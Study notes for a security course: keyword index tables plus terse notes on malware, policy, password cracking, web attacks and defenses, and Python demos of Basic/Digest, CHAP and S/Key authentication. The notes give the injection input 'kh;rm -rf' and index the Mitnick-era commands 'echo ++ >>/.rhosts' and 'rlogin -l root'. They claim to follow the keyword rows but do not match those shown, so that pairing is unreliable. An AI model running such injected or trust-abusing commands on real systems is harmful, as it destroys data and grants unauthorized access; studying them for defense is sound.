Incident Handling-Containment(3)      2   166
Incident Handling-Eradication(4)      2   168
Incident Handling-Recovery(5)         2   170
Incident Handling-Lesson learned(6)   2   172
Incident Handling-Mistakes            2   173
Incident Handling-summary               2   174
Legal aspects of Incident Handling    2   174
Legal system                          2   176
Common law                            2   176
Criminal law                          2   177
Civil law                             2   177
Regulation                            2   178
HIPAA                                 2   178
SOX (Sarbanes-Oxley Act)                2   178
PCI (Payment card industry)           2   178
FDA                                   2   178
FDIC                                  2   178
OCC                                   2   178
BIS                                   2   178
GLBA                                  2   178
SB1386                                2   178
LOPD                                  2   178
Seizure with warrant                  2   179
Seizure                               2   179
warrant                               2   179
Arrest                                2   181
False Arrest                          2   181
Evidence - Admissible                 2   182
surveillance                          2   183
Chain of Custody                        2   184
Evidence integrity                    2   186
Real evidence                         2   187
Direct Evidence                    2   187
Hearsay evidence                   2   187
Best evidence                      2   188

IW (Information Warfare)           2   192
Information Warfare                2   192
information warfare examples       2   194
information warfare tools          2   197
Perception management                2   197
Warfare affecting US Presidency      2   198
Offshore coding                      2   199
Warfare and Terrorism                2   200
Information Warfare theory           2   202
IW -Asymmetric warfare             2   202
Zero-sum game                      2   202
IW - Cycle time                    2   204
IW - indication and warning        2   205
indication and warning Model       2   205
Stimulus vs. response              2   206
info warfare - Offensive player    2   207
IW - Offensive player              2   207
IW - offensive operation goals     2   208
IW - increase value to offense     2   209
IW - Confidentiality attacks       2   209
IW - Decrease value to defense     2   210
IW - Defense is not dominant       2   211

Web communications                 2   217
Web application architecture       2   218
presentation tier                  2   218
application tier                   2   218
persistence tier                     2   218
two-tier web application           2   218
three-tier web application         2   218
N-tier web application             2   219
Web architecture Hardening         2   220
Server Hardening                   2   220
Database Hardening                   2   221
HTTP                              2   222
URL Format                        2   222
HTTP Header / Metadata            2   222
HTTP Status code                  2   222
HTTP Transactions                 2   224
HTTP Status code                  2   225
HTML(Hypertext Markup language)   2   226
HTML Forms                        2   227
Form Submission Action            2   227
HTTP Methods                      2   217
GET                               2   228
POST                              2   228
QUERY_STRING                      2   228
URL encoding                      2   228
MIME encoding                     2   228
HTML form example                 2   229
Cookies                           2   231
Persistent Cookie                 2   232
Session cookie                    2   232
Achilles                          2   232
Paros                             2   232
SSL (secure socket layer)         2   234
TLS (transport layer security)    2   234
Server side Programming           2   236
CGI common gateway interface      2   236
Apache Tomcat                     2   236
Client side programming           2   238
Sandbox                           2   238
Code signing                      2   239
java applet(Signed java applet)   2   239
Activex (signed Activex )         2   239
DLL (Dynamic-link library)        2   239
Web application Secure            2   240
SW testing                        2   240
web - Performance testing         2   241
web - configuration management    2   241
web - Version control             2   241
web - staging and deployment      2   241
Secure coding                      2   242
Validate                           2   242
obfuscation                        2   242
off-the-shelf library              2   243
web application service provider   2   244
ASP (application service provider) 2   244
SLA (service level agreement)      2   244
web vulnerabilities                2   246
Web Authentication                 2   247
Basic mode Authentication          2   247
Digest mode Authentication         2   248
HTTP Authentication                2   247
Form based Authentication          2   248
Base-64 encoding                   2   247
INPUT TYPE="PASSWORD"              2   248
Web Authentication attack          2   248
Multifactor Authentication         2   248
Token web Authentication           2   249
One-time password Authentication   2   249
out-of-band Authentication         2   249
footprint web Authentication       2   249
Challenge question web authen      2   249
web access control                 2   250
Exploration Air                    2   250
web - Microsoft FrontPage          2   250
Directory traversal attack         2   251
session tracking                   2   252
session id                         2   252
session hijacking                  2   253
Session attack protection          2   255
session toolkit                    2   255
input attacks                      2   257
command injection                  2   258
OS command injection               2   258
OS command injection defense       2   259
Buffer overflow attack             2   260
arbitrary code execution           2   260
Buffer overflow defence        2   261
SQL Injection                  2   262
absinthe                       2   263
blind sql injection            2   263
SQL Injection defense        2   264
cross site scripting           2   265
XSS                            2   265
cross site scripting defense   2   267
blacklisting                   2   268
Whitelisting                   2   268
web application monitoring   2   270
Defacement monitoring          2   270
Availability monitoring        2   270
Performance monitoring         2   271
Latency                        2   271
throughput                     2   271
HP sitescope                   2   271
log file monitoring          2   271
http 400 bad request         2   271
http 403 forbidden             2   271
http 404 not found             2   272
http 500,501,503               2   272
Bulletin Board                 2   272
web- cracking tools            2   273
Stunnel                        2   273
Brutus                         2   274
Achilles                       2   274

libwhisker                     2   275

nikto                          2   275
firefox Add N Edit Cookies   2   276
firefox Tamper Data          2   277
WebScarab                    2   278
White box test                 2   274
black box test                 2   274
Whisker                        2   275
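
What the Basic and Digest schemes in the Web Authentication rows above actually put in the Authorization header, as an added example (not from the original notes). Basic is Base-64 encoding, not encryption, so it is only as safe as the transport (SSL/TLS); Digest (RFC 2617 with qop=auth) is a challenge/response built on MD5, and the server can reject a replayed response by tracking the nonce count. Realm, user names, passwords, URI and the client nonce are constructed for the demo.

```python
"""Added example: HTTP Basic vs Digest authentication, both sides of the exchange."""
import base64
import hashlib
import os


def md5hex(*parts):
    """MD5 over colon-joined fields, the primitive RFC 2617 Digest auth is built on."""
    return hashlib.md5(":".join(parts).encode()).hexdigest()


def basic_header(user, password):
    """Client side of Basic auth."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def decode_basic(header):
    """Anyone who sees the header (sniffer, proxy log) recovers the password."""
    scheme, _, token = header.partition(" ")
    if scheme != "Basic":
        raise ValueError("not Basic auth")
    user, _, password = base64.b64decode(token).decode().partition(":")
    return user, password


def digest_response(user, realm, password, method, uri, nonce, nc, cnonce, qop="auth"):
    """Client side of Digest auth: the password enters only through HA1."""
    ha1 = md5hex(user, realm, password)
    ha2 = md5hex(method, uri)
    return md5hex(ha1, nonce, nc, cnonce, qop, ha2)


class DigestServer:
    def __init__(self, realm, users):
        self.realm = realm
        # Store HA1 rather than the password: enough to verify, and bound to this realm.
        self.ha1 = {u: md5hex(u, realm, p) for u, p in users.items()}
        self.nonces = {}  # nonce -> highest nonce-count accepted (replay detection)

    def challenge(self):
        """The WWW-Authenticate parameters: a fresh random nonce per challenge."""
        nonce = os.urandom(16).hex()
        self.nonces[nonce] = 0
        return {"realm": self.realm, "nonce": nonce, "qop": "auth"}

    def verify(self, user, method, uri, nonce, nc, cnonce, response):
        if user not in self.ha1 or nonce not in self.nonces:
            return False
        if int(nc, 16) <= self.nonces[nonce]:  # replayed or out-of-order count
            return False
        expected = md5hex(self.ha1[user], nonce, nc, cnonce, "auth", md5hex(method, uri))
        if expected != response:
            return False
        self.nonces[nonce] = int(nc, 16)
        return True


def digest_demo():
    """Returns (genuine login accepted, identical message replayed, wrong password)."""
    server = DigestServer("app", {"alice": "s3cret"})
    chal = server.challenge()
    args = ("alice", "GET", "/private", chal["nonce"], "00000001", "abc123")
    resp = digest_response("alice", "app", "s3cret", "GET", "/private", chal["nonce"], "00000001", "abc123")
    ok = server.verify(*args, resp)
    replay = server.verify(*args, resp)
    bad = digest_response("alice", "app", "guess", "GET", "/private", chal["nonce"], "00000002", "abc123")
    wrong = server.verify("alice", "GET", "/private", chal["nonce"], "00000002", "abc123", bad)
    return ok, replay, wrong


if __name__ == "__main__":
    hdr = basic_header("alice", "s3cret")
    print(hdr, "->", decode_basic(hdr))
    print("digest (ok, replay, wrong password):", digest_demo())
```

Digest still lets an attacker who captures the header run an offline dictionary attack against HA1, which is why the notes list form-based login over SSL/TLS as the practical choice.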
Notes (book 2; one note per keyword row above, in the same order)

risk = threat x vulnerability
the opposites of CIA are Disclosure, Alteration, Destruction (DAD)
C = pharmaceuticals, I = banks & financial institutions, A = e-commerce (which property each sector prioritizes)
primary threats: malware, insiders, natural disasters, terrorism
weakness in the system (known, unknown, zero-day)
uniform protection, protected enclaves, information centric, threat vector analysis
all parts of the org receive equal protection; vulnerable to insiders; the weakest approach
segmenting your network: many VLANs, VPNs, firewalls
identify critical assets and provide layered protection: the center is your assets, protected by different layers: application, host & network
a threat needs a vector to reach the vulnerability, so shut the vector down; e.g. USB, auto-answer modems: disable them

software written with malicious intent to perform actions without the user's permission
malware that replicates from PC to PC
malware able to replicate; it is parasitic: it must attach to another program
must be attached to another program (needs a container)
places itself in the boot process so that it loads at startup
uses instructions that can be interpreted within an application (Word, Excel)
attaches itself to an existing program (.com, .exe)
attaches itself to an existing program (.com, .exe)
prepending at the start of the program, appending at the end, overwriting a portion of the file
write themselves into blank or unused areas of host files
affects EXE files only


can infect the boot record as well as program files; can spread across the network
no need to attach to a program

availability attack (DoS); used holes in the Unix sendmail program & finger daemon
Ramen, Lion
web defacement & mails passwords to the attacker; targets Red Hat Linux through holes in file-transfer and printing services (wu-ftpd, rpc.statd, LPRng)
opens a root shell & installs a trojaned version of SSH; cannot be cleaned (rebuild); exploits a vulnerable BIND name server
DoS attack; uses UDP port 1434; exploits a buffer overflow in MS SQL Server 2000 & MSDE
Microsoft SQL Server Desktop Engine
W32; infects systems and their backups; systems run slowly and shut down
W32; infects systems and their backups; systems run slowly and shut down
exploits a vulnerability in the MS Server service (MS08-067), brute-forces passwords, infects removable devices with an autorun script
patch, DiD, network partitioning


mapping the network, conducting a vulnerability assessment
e.g. spyware (trojan, keystroke monitor); vulnerabilities in ActiveX, Java applets, JavaScript


destroy data, leak confidential data, backdoor
destroys data; activates every 26 April, overwrites data on the hard disk (and the flash BIOS)
destroys data; activates every 26 April, overwrites data on the hard disk (and the flash BIOS)
information leakage; sends documents by e-mail to the attacker
information leakage; sends the PGP private keyring via FTP
information leakage; obtains information from the victim's registry and sends it via FTP
backdoor; scans for hosts infected with the SubSeven trojan, authenticates with its master password, removes it (and takes the host over)
used as the channel the worm uses to communicate with its creator
removable media, e-mail attachments, web browsing, network vulnerabilities, instant messaging, peer-to-peer
infects Solaris via a buffer overflow in the sadmind program and IIS via the Unicode directory traversal bug; defaces web pages
possesses multiple propagation vectors, e.g. Nimda
worm; works to increase the number of infected systems
messengers, ICQ

compromises MyDoom-infected machines through MyDoom's backdoor, removes MyDoom and terminates antivirus

mass-mailing worm that also spreads over peer-to-peer shares
peer-to-peer application
activity monitoring programs, malware scanners, file integrity checking, stripping e-mail attachments, patching
scanner, activity monitor, integrity check

behavior blocker

searches files for malicious-looking code routines; does not depend on signatures
searches files for malicious-looking code routines; does not depend on signatures
performs integrity checks (file hashes compared against a baseline)
performs integrity checks (file hashes compared against a baseline)
tools that use signatures and behavior to examine network traffic
tools that use signatures and behavior to examine network traffic


What to do
protect information, people, the organization
what makes their job easier; for executives, speak the language of money
the idea behind the brand: what customers expect from you, the way we want people to view us
look into the mirror: what security looks like now
more security benefits, but more cost and security staff
more informal, but higher risk




information security standard

defines the acceptable or appropriate use of the organization's IT resources
policy (who, what, why); procedure (how, where, when)
policy (who, what, why); procedure (how, where, when)
a directive that indicates a decision to follow toward an objective
step-by-step instructions used for operations; mandatory
hardware and software related; more specific; mandatory
more specific implementation (specific technical details) than a standard; compulsory (mandatory)
a suggestion (recommendation); not mandatory; assists
e.g. user authentication, password policy, acceptable use, etc.

SMART + 5 Ws (What, Who, Where, When, Why)
Specific, Measurable, Achievable, Realistic, Time-based
the process by which an organization formulates security policy based on ISO 17799
Program policy, issue-specific policies, system-specific policy
high level; provides direction for compliance with industry standards such as ISO, QS, BS, AS
password procedures, internet usage guidelines; narrower than the program policy
specific to each system

what problem are you trying to solve
provides guidelines for appropriate use of the organization's resources
whom the policy applies to and which systems are applicable
termination, reprimand
termination, reprimand
NDA and copyright
protects sensitive information, confidentiality, both parties; a legal document, must be clear and reviewed
protects sensitive information, confidentiality, both parties; a legal document, must be clear and reviewed
Intellectual Property:
Copyright:
Digital Millennium Copyright Act
point of contact
BCP & DRP
plan for emergency response (DRP & business resumption plan); restore the business after a disaster; long term
the impact to the business does not just involve IT but all levels of the organization
refers to an actionable plan that coordinates efforts to restore the organization to normal working; involves all levels of the organization, not only IT; covers the tactical recovery of IT systems
recovery of IT systems (data center, business operations, location, processes); tactical


plan for the worst, hope for the best
have two sites that cover one another in case of disaster
have two sites; test patches on one and, if they work well, make it primary and the other the backup, which then tests the next patch


Assess, Evaluate, Prepare, Mitigate, Respond, Recover
determine the MTD (maximum tolerable downtime); evaluates the effect of a disaster over time
how long your system can be down without affecting the company
project initiation, risk analysis, BIA, build the plan, test and validate it, update it, approve




many areas of IT
the creator of the data, or whoever has authority over the data, e.g. C-level
the admin responsible for managing access
create, modify, delete
monitor unsuccessful logins
top secret, secret, confidential, SBU, unclassified
sensitive data that shouldn't be released, like social security numbers
who you claim to be; proved by authentication, then authorization decides what you may do
something you know, have, are; someplace you are (console)
what you are authorized to do and have access to; least privilege
auditing your logs
password
token
biometrics
GPS
least privilege, need to know, separation of duties, rotation of duties
least privilege, further restricted by time
DAC, MAC, RBAC, ...
discretionary: the owner manages access, e.g. user name & password; the owner can grant access to another user without admin permission
users must have clearance to access data and cannot pass it on to others, e.g. SELinux; requires a lot of work to maintain
assigns users to roles or groups based on their function
action based on rules for a user (subject) operating on data (object)
associates users and their privileges with each object (access control list)
associates a list of objects (data) and their privileges with each user (capability list)
account administration, maintenance, monitoring, revocation

log on once per day; allows centralized management using LDAP, AD, Kerberos
TACACS, RADIUS
weak: sends the password in clear text; the user can hash it before sending, but it is still weak (a captured hash is replayable)
uses challenge/response authentication with a random challenge; never sends the password
TACACS, RADIUS
TCP based; Cisco proprietary: TACACS+
UDP based
TCP based replacement for RADIUS
uses Kerberos V5; does not send the password over the network
uses Kerberos V5; does not send the password over the network

divides authentication into domains with trusts between them; authenticate once per session
for encryption, not recommended for passwords (the stored password can be recovered)
MS (Microsoft)
analysing software to determine how it works, e.g. the algorithm it uses
one-way hashing, one-way encryption
one-way hashing, one-way encryption
how hash-based authentication is done
offline process of guessing passwords given the password file information
offline process of guessing passwords given the password file information
dictionary attack, brute force, hybrid, pre-computation brute force attack (rainbow table)

quality of the algorithm, key length, CPU cycles, character set supported, password length
dictionary attack, brute force, hybrid, pre-computation brute force attack (rainbow table)
find the user id and encryption algorithm, obtain the encrypted password, create a list of possible passwords, encrypt each password in the list, see if any match
fastest method; countermeasures: policy (written rules), filter (technical mechanism)
Hello == he110
always recovers the password; it is only a matter of time
pre-compute the hashes and store the result in a DB: rainbow table
hashed passwords
attacker; admin: recover forgotten passwords, audit, check that the filter is effective, aid users in migrating

cracking technique; rate quoted in the notes: 137 MB/s
employ stronger password hashing
employ stronger password hashing
DES, double-length DES, BSDI extended DES, MD5, Blowfish, Andrew File System (AFS), NTLM passwords
each mode cracks passwords in a different way
no sorting; allows putting common words at the beginning of the list
uses the user name and GECOS information, adds previously guessed passwords; faster than wordlist mode
most powerful, most time-consuming; tries all combinations of letters, numbers, special characters
can be extended with custom routines written in C-like code
can crack salted MD5 hashes

$1$ means hashed with MD5 (Unix salted MD5 crypt)
LAN Manager: 14 characters, split into two 7-character halves, no salt, all converted to upper case
hashing algorithm; two identical passwords produce the same hash (no salt)
auditing/cracking tool
Cain's process for extracting password hashes
MS protection mechanism: encrypts the SAM password hashes with a 128-bit key
Security Account Manager
uses hybrid rules: reverse, upper to lower case, append 2 digits
user selects the character set (all alpha; alpha + numeric + special characters)
uses the time/memory trade-off, optimized with pre-computed tables
pre-computed hashes; cryptanalytic
time/memory trade-off by Philippe Oechslin
tool: GUI; generates rainbow tables usable in Cain (MD5, SHA, LanMan, NTLM)
tool: cracking tool
defines the characters used to generate rainbow tables
tool: generates rainbow tables
tool: generates rainbow tables

strong policy, shadow passwords, one-time passwords, passwd+, fighting pre-computation attacks, protecting the encrypted passwords
account lockout, complexity, users can't reuse the last 5 passwords, change interval < time to crack
account lockout, complexity, users can't reuse the last 5 passwords, change interval < time to crack
/etc/shadow rather than /etc/passwd
each login uses a different password (token, challenge/response, S/Key)
time-synchronous: the code is triggered by the time of day
not time based: user id -> challenge -> user types it into the device -> response -> user types it back
a list of passwords is pre-computed when the system is first configured; each login uses a different S/Key
physical attributes: hand, eye, voice, face; mannerisms: keystroke, handwriting, gait
keystroke, handwriting, gait
amount of time it takes to authenticate using biometrics
False Reject Rate: the percentage of legitimate users falsely rejected
False Accept Rate: the percentage of readings in which the system accepts an unauthorized user
the percentage of legitimate users falsely rejected; the system fails to accept a genuine user
the percentage of readings in which the system accepts an unauthorized user
FAR and FRR are equal
FAR and FRR are equal
the percentage of legitimate users falsely rejected
the percentage of readings in which the system accepts an unauthorized user
FAR and FRR are equal
FAR and FRR are equal
the process by which a biometric is initially recorded
senses the heat in the face caused by the flow of blood under the skin

the response depends on the domain name, the server challenge and a random value


uses salts, the server challenge and a randomized final hash; the response depends on the session, domain and user name
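
The PAP vs CHAP notes and the S/Key note above, carried through as an added example with both sides' messages and a replay attempt against each; this is not code from the original notes. The shared secrets, user names, seed and hash choices (MD5 for CHAP as in RFC 1994, SHA-256 in place of S/Key's folded MD4/MD5) are constructed for the demo.

```python
"""Added example: PAP vs CHAP exchange and an S/Key one-time password chain."""
import hashlib
import os
import secrets


# --- PAP: the password itself crosses the link --------------------------------
def pap_request(user, password):
    """What a sniffer sees: the credential, reusable as-is."""
    return {"user": user, "password": password}


def pap_verify(request, password_db):
    return password_db.get(request["user"]) == request["password"]


# --- CHAP (RFC 1994): response = MD5(identifier || secret || challenge) ---------
def chap_response(identifier, secret, challenge):
    """Computed by the client; the secret never leaves it."""
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()


class ChapServer:
    def __init__(self, secret_db):
        self.secret_db = secret_db   # user -> shared secret (stored reversibly)
        self.pending = {}            # user -> (identifier, challenge) awaiting a response
        self.identifier = 0

    def challenge(self, user):
        """Message 1: a fresh random challenge, usable exactly once."""
        self.identifier = (self.identifier + 1) & 0xFF
        chal = os.urandom(16)
        self.pending[user] = (self.identifier, chal)
        return self.identifier, chal

    def verify(self, user, identifier, response):
        """Message 2 check: recompute and compare in constant time."""
        if user not in self.pending:
            return False
        expected_id, chal = self.pending.pop(user)
        if identifier != expected_id:
            return False
        expected = chap_response(identifier, self.secret_db[user], chal)
        return secrets.compare_digest(expected, response)


def chap_replay_demo():
    """A legitimate login, then an attacker replays the captured (id, response)
    against a new challenge. Returns (legitimate_ok, replay_ok)."""
    secret = b"correct horse battery"
    server = ChapServer({"alice": secret})
    ident, chal = server.challenge("alice")
    captured = (ident, chap_response(ident, secret, chal))
    legit = server.verify("alice", *captured)
    server.challenge("alice")                 # attacker triggers a fresh exchange
    replay = server.verify("alice", *captured)
    return legit, replay


# --- S/Key: a chain of one-time passwords -------------------------------------
def skey_chain(seed, n):
    """H^n(seed): the seed hashed n times."""
    value = seed
    for _ in range(n):
        value = hashlib.sha256(value).digest()
    return value


class SkeyServer:
    def __init__(self, seed, n):
        """Enrolment: store only H^n(seed) and the counter, never the seed."""
        self.stored = skey_chain(seed, n)
        self.counter = n

    def login(self, presented):
        """Accept H^(counter-1)(seed) if hashing it once gives the stored value, then
        move the stored value back one step so the same password cannot be reused."""
        if hashlib.sha256(presented).digest() == self.stored:
            self.stored = presented
            self.counter -= 1
            return True
        return False


def skey_demo(logins=3):
    """Client and server share the seed only at enrolment. Returns
    (results of successive logins, result of replaying the first one-time password)."""
    seed = b"constructed-seed"
    server = SkeyServer(seed, n=100)
    first = skey_chain(seed, 99)
    results = [server.login(skey_chain(seed, 99 - i)) for i in range(logins)]
    return results, server.login(first)


if __name__ == "__main__":
    print("PAP replay of a captured request:", pap_verify(pap_request("alice", "pw"), {"alice": "pw"}))
    print("CHAP (legitimate, replay):", chap_replay_demo())
    print("S/Key (logins, replay):", skey_demo())
```

The PAP request verifies every time it is resent, the CHAP response is rejected once the challenge changes, and each S/Key password works exactly once because the server only ever stores the next hash in the chain.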

first aid
one or multiple events + harm or attempt to do harm
observable occurrence in a system or network (system crash, packet flooding on the network, system boot sequence, authorized logon is an event); some events make an incident
harm or threat of harm, e.g. a NetBIOS scan on Unix is a threat of harm
Preparation, Identification, Containment, Eradication, Recovery, Lessons learned




IDS, logs, system reboots, poor performance, notify the correct people, utilize the help desk
assign a primary handler, identify evidence
isolate and eliminate the source of the incident




common law, civil law




SOX,GLBA,HIPAA,PCI
Health Insurance Portability and Accountability Act of 1996
Accounting
Merchants
regulates drugs




deprives an individual of his freedom

reliable, relevant to the case
monitor the network or conduct surveillance to gather info
document evidence, maintain its integrity
make hashes
tangible item: seized PC, USB drive, printout
what the handler actually saw
3rd party testimony: "I heard from someone that ..."
Photos, models, drawings are used.

competition between offensive and defensive players
competition between offensive and defensive players

perception management (social engineering), malicious code, predictable response


outsourcing SW

Asymmetric warfare, cycle time, players and roles, indication and warning
a small investment has a very large effect

time to decrypt info, time between the vulnerability and the patch and the release of a worm


SYN --> stimulus, SYN/ACK --> response
insider, attacker, criminal, terrorists, governments, corporations
insider, attacker, criminal, terrorists, governments, corporations
is to cause harm, win-lose situation, more valuable to offense, less to defense


decrease integrity, decrease availability


stateless communication; retrieving info by GET, HEAD; sending info by POST, PUT

web server (IIS, Apache), provides I/P and O/P to users, under constant attack
code and business logic, language (C, Java, PHP, VB), application server (WebSphere, WebLogic, Tomcat, .NET)
DB, SQL, Oracle, MySQL
combines the presentation and application in one tier, for small business, difficult to secure
more secure, DID concept
clustering services to increase load balancing and redundancy, more secure than 3-tier
separate data and logic from the presentation layer, FW & DMZ, server & DB hardening, HIDS, backup
patching, close (ports, applications, default user accounts), strong passwords ... etc.
update, patch, isolate, restrict access so the user cannot add or drop tables
URL (<Protocol>://<Server name or address>/<Resource Name>)
request or response: browser/software version, content types, languages & protocols accepted, cache
200 -> success, 300 -> redirection, 400 -> bad request, 500 -> server error

bad request (401 unauthorized, 403 forbidden, 404 not found, etc.), 500 range: server errors or time out
tool like Dreamweaver
takes user input, dynamic (JavaScript)
GET, POST
GET, POST, HEAD, PUT
user data are appended to the URL
does not append any data to the URL; it appends it to the HTTP header, which may be encrypted




keep track of user state, created by the web server and stored in the web browser
the browser stores them in a text file on the hard disk and they persist after the browser exits; have an expiration date
stored only in memory; when the browser exits it is lost forever
tool that can edit a session cookie
tool that can edit a session cookie
provides encryption, identity verification, data integrity; uses port 443
provides encryption, identity verification, data integrity; uses port 443
can be run on the web server, app server, and as stored procedures on the database server
standard for interfacing application software with a web server; allows the web server to pass info (C, Perl, Python)
application server that implements Java, Java Active Pages
enhance the user interface, requires (JavaScript, ActiveX, Java, Flash)
run the browser in restricted mode, limits the ability to interact with other data on the PC, e.g. applet
uses digital signatures to assure the user that code comes from a known source
allows the user to assign a policy that offers control (e.g. author identity, source code)
not secure; its controls run with the same privilege as the user, who may be admin


run a program with the intent of finding errors
can withstand DoS
separate workplaces, version control system
track changes to the code so they do not overlap
before moving code to production a separate team must test it again
validate user input, initialize variables, don't make the app require admin privileges, don't display errors

making code more difficult to follow or understand
the ready-made library
SLE, patch audit every 6 months, vulnerability scan
SLE, patch audit every 6 months, vulnerability scan
define how to maintain the security of the hosted app

HTTP authentication (basic mode, digest mode), form-based authentication
data sent in the HTTP header in clear text, Base64 encoding
uses one-way MD5, data sent in the HTTP header
user authentication sent in the HTTP header, basic authentication, digest authentication
uses an HTML form field to request authentication, password sent in clear text
isn't encrypted and provides no security, easily reversible
will show asterisks rather than displaying the password
brute force -> account lockout; bypass authentication -> check first that the user is logged in
password, certificate, token, one-time authentication, third mechanism

something you have, list of passwords
SMS password
cookie, SW or signature, client IP --- easy to break

you must limit access to your web site, keep users out (default pages, code library, disable directory browsing, URL directory traversal)
default web page in IIS4 caused DoS and increased CPU to 100%
have more vulnerabilities that cause DoS

use a session ID in a cookie or URL query
in a cookie or URL query
session ID in URL -> attacker can edit it; hidden field or cookie -> can use a proxy or Firefox plugin
make it random or long, digitally sign or hash it, provide a new session ID at authentication, set an expiry time
tools like WebScarab
OS command injection, buffer overflow, SQL injection, XSS
command in the input form, e.g. kh;rm -rf
command in the input form, e.g. kh;rm -rf
avoid making system calls within the application tier, remove malicious characters or define valid characters
Web attack
Web attack
update, patch (web server and language), run a vulnerability scanner, IPS, validate user input

tool to perform blind SQL injection
black box attack
validate user input, filter, length limit, access control, don't display SQL errors
poor input validation, includes JavaScript, inline frames, steals cookies, affects HTTPS, HTTP
poor input validation, includes JavaScript, inline frames, steals cookies, affects HTTPS, HTTP
avoid reflecting user input back to the web site, filter, validate, translate & encode
filter out bad characters
allow only necessary characters
file integrity (Tripwire), performance, logs. Types: defacement monitoring, availability monitoring, performance monitoring
alerts when unauthorized changes are made to parts of the web application, uses a file integrity checker
alerts when the site is unavailable, helps to verify the functionality of the network and web server.
CPU, memory utilization, latency, throughput
time between making a request and seeing the result
number of items processed per time unit
web service monitoring tool.
monitor the access log and error log.
something abnormal in the header, indicates scanning or an attempt to exploit a vulnerability
user attempts to load content they are not authorized to

server error or time out
vulnerable to input attacks
Web browsers, Stunnel, Brutus, Achilles, Libwhisker, Nikto
is a generic proxy you can use to provide SSL capabilities, can be used to hack SSL web sites
brute force and password guessing tool, Windows only
HTTP proxy (middleman between web server and browser), can negotiate separate SSL (server, client)
has an impressive list of CGI vulnerabilities, can perform brute force of URLs, muck with cookies ...etc., foundation of the Whisker scanner
finds default web files, examines web server and CGI security, looks for misconfigurations, based on libwhisker, discovers vulnerabilities in sites


proxy, HTTP, HTTPS, cookie analysis, session ID detection
code is open source
code is closed source
vulnerability scanner, CGI vulnerability scan
keyword                        book       page

Mitnick-Shimomura                     3    4
Mitnick-Shimomura                     3    7
Trust Relationship                    3    8
Finger                                3    9
.rhosts file                          3    9
host.equiv file                       3    9
showmount                             3    9
rpcinfo                               3   10
remote login service, rlogin          3   11
rlogin                                3   11
ISN guessing drawback                 3   15
rsh protocol                          3   15
echo ++ >>/.rhosts                    3   16
rlogin -l root                        3   16
information security cycle            3   18
patching systems                      3   19
finger -l @target                     3   20
HIDS                                  3   22
risk management cycle                 3   23
Mitnick-Shimomura defense             3   17
malicious code                        3   28
logic bombs                           3   28
trojan horses                         3   28
trap doors                            3   28
pseudo flaw                           3   28
smurf attack                          3   29
syn flood                             3   29
DDOS                                  3   29
TFN                                   3   29
trinoo                                3   29
tfn2k                                 3   29
Fork() bomb                           3   29
physical attacks                      3   30
buffer overflow                       3   31
injection vector                      3   32
return address                        3   32
big endian                            3   32
little endian                         3   32
endian                                3   32
intel x86 processor                   3   32
networking                            3   32
heap memory                           3   32
NOP                                   3   32
low-land stack                        3   33
brute forcing                     3   34
remote maintenance                3   36
browsing                          3   37
race conditions                   3   38
Toc/Tou                           3   38
interrupts                        3   39
alteration of code                3   40
rootkits                          3   41
rootkits                          3   41
rootkits linux                    3   41
rootkits windows                  3   41
loadable kernel modules           3   41

firewall                          3   48
firewall implementation           3   48
firewalls objectives              3   48
indication and warning            3   49
firewall benefits                 3   50
firewalls shortcomings            3   51
firewall's leak                   3   51
firewall default rule             3   52
ingress filtering                 3   53
egress filtering                  3   53
downstream liability              3   53
screened network traditional      3   54
multi-level screened network      3   54
MySql port                        3   55
stateless firewall                3   56
nmap scan of stateless firewall   3   57
stateful firewall                 3   58
state flag                        3   58
SYN-SENT                          3   58
SYN-RECV                          3   58
ESTABLISHED                       3   58
FIN-WAIT1                         3   58
LAST-ACK                          3   58
FIN-WAIT2                         3   58
CLOSED                            3   58
Icmp error packets                3   59
stateful inspection ftp           3   60
proxy firewall                    3   62
process table                     3   62
personal firewall                 3   64
application control firewall      3   64
kuang2 virus                      3   65
firewall and ids                  3   65
Nat                               3   66
private address space                  3   67
RFC 1918                               3   67
Pat                                    3   69
honeypot                               3   72
honeytoken                             3   72
honeypot                               3   72
honeypot liability                     3   73
relay                                  3   74
research honeypots                     3   74
hardened honeypot                      3   75
honeypot advantages                    3   76
honeypot fingerprinting                3   78
honeypot disadvantage                  3   78
honeypot types                         3   80
netcat listener                        3   82
honeyd                                 3   83
honeynet project                       3   85
GenI honeynet                          3   85
honeypot deploying                     3   87
honeypot checklist                     3   89
LaBrea Trapit                          3   89

R^3                                    3   96
ROI (Return on investment)             3   97
ROSI (Return on Security investment)   3   97
ROI                                    3   97
ROI                                    3   97
vulnerability axioms                   3   98
threat types                           3   99
vectors                                3   99
response(corrective control)           3   99
threat concern                         3   100
bypassing firewall techniques          3   103
firewall bypassing techniques          3   103
phone sweep                            3   104
modems issue                           3   104
http tunnels                           3   106
social engineering                     3   107
social engineering                     3   108
social engineering defense             3   109
firewall bypassing protection          3   110
legion                                 3   113
Hping3                                 3   114
nmap decoy scan                        3   115
Hping3 features                        3   116
attack history                         3   117
satan                                       3   117
jackal                                      3   117
nlog tool                                   3   117
TCP Finger-Printing                         3   117
worm toolkits                               3   117
sobig worm                                  3   118
welchia                                     3   118
msblaster                                   3   118
canvas                                      3   118
port scanning                               3   121
nmap                                        3   122
gopher                                      3   123
filtered port                               3   125
unknown port                                3   125
nmap scan types                             3   126
randomize_hosts                             3   126
ping scan                                   3   127
tcp full open                               3   128
tcp half open(syn scan)                     3   128
udp scan                                    3   128
icmp rate limiting                          3   128
os finger printing                          3   129
vulnerability scanners                      3   131
Nasl (nessus attack scripting language)     3   134
nessus server                               3   135
nessus client                               3   135
nessus color codes                          3   142
wireless scanning                           3   145
netstumbler                                 3   146
kismet                                      3   148
kismet_drone tool                           3   148
kismet interface                            3   149
kismet color codes                          3   149
war driving                                 3   150
wireless network mapping mitigation
rf-barriers                                 3   151
war dialing                                 3   152
toneloc                                     3   153
HVAC (heating, ventilation, air conditioning) 3   154
war dialing mitigating                      3   154
parallel modem option                       3   155
pen testing                                 3   155
pen testing techniques                      3   157
nachi worm                                  3   159
vulnerability false positive                3   161

IDS                                         3   166
IDS - What is IDS not?                  3   167
IDS Technology                          3   168
IDS alerts                              3   171
IDS EOI                                 3   171
true positive                           3   171
false positive                          3   171
true negative                           3   171
false negative                          3   171
network IDS                             3   174
signature analysis                      3   175
nop                                     3   176
anomaly analysis                        3   178
application protocols analysis          3   179
shallow inspection                      3   181
deep inspection                         3   181
IDS - modern ids                        3   182
ids evasion                             3   183
data normalization                      3   183
nids advantages                         3   184
honey token                             3   185
nids challenges                         3   186
nids topology limitations               3   187
network taps                            3   188
